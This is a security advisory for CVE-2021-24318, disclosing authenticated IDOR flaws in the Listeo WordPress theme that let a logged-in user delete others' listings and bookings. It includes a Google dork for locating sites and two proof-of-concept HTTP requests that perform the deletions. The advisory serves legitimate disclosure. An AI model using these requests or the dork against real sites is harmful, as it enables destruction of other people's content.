/*!
- # VULNERABILITY: Listeo WordPress Theme <= 1.6.10 - Multiple Authenticated IDOR Vulnerabilities
- # GOOGLE DORK: inurl:/wp-content/themes/listeo/
- # DATE: 2021-02-10
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Purethemes [ https://purethemes.net ]
- # SOFTWARE VERSION: <= 1.6.10
- # SOFTWARE LINK: https://themeforest.net/item/listeo-directory-listings-wordpress-theme/23239259
- # CVSS: Multiple
- # CWE: CWE-639
- # CVE: CVE-2021-24318
*/
### -- [ Info: ]
[i] Multiple Authenticated IDOR vulnerabilities was discovered in the Listeo theme through v1.6.10 for WordPress.
[i] Plugin(s) affected: Listeo Core by Purethemes [ https://purethemes.net ].
### -- [ Vulnerabilities: ]
[x] Authenticated IDOR | Post/page deletion: /my-properties/?action=delete&property_id=&_wpnonce=.
[x] Authenticated IDOR | Booking deletion: action=listeo_bookings_manage&booking_id=&status=deleted.
### -- [ Impact: ]
[~] Possibility to remove any content from the targeted website, up to the complete erasure of all content entirely.
### -- [ CVSS 3.1: ]
[%] Authenticated IDOR | Post/page deletion: AV:N/AC:L/PR:L/UI:R/S:U
[%] Authenticated IDOR | Booking deletion: AV:N/AC:L/PR:L/UI:R/S:U
### -- [ PoC #1 | Authenticated IDOR | Permanent post/page deletion: ]
[!] https://listeo.pro/my-listings/?status=pending&action=delete&listing_id=13&_wpnonce=88a432b100
[!] GET /my-listings/?action=delete&listing_id=13&_wpnonce=88a432b100 HTTP/1.1
Host: listeo.pro
Cookie: [user cookies]
### -- [ PoC #2 | Authenticated IDOR | Permanent booking deletion: ]
[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: listeo.pro
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: [user cookies]
action=listeo_bookings_manage&booking_id=13&status=deleted
### -- [ Contacts: ]
[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze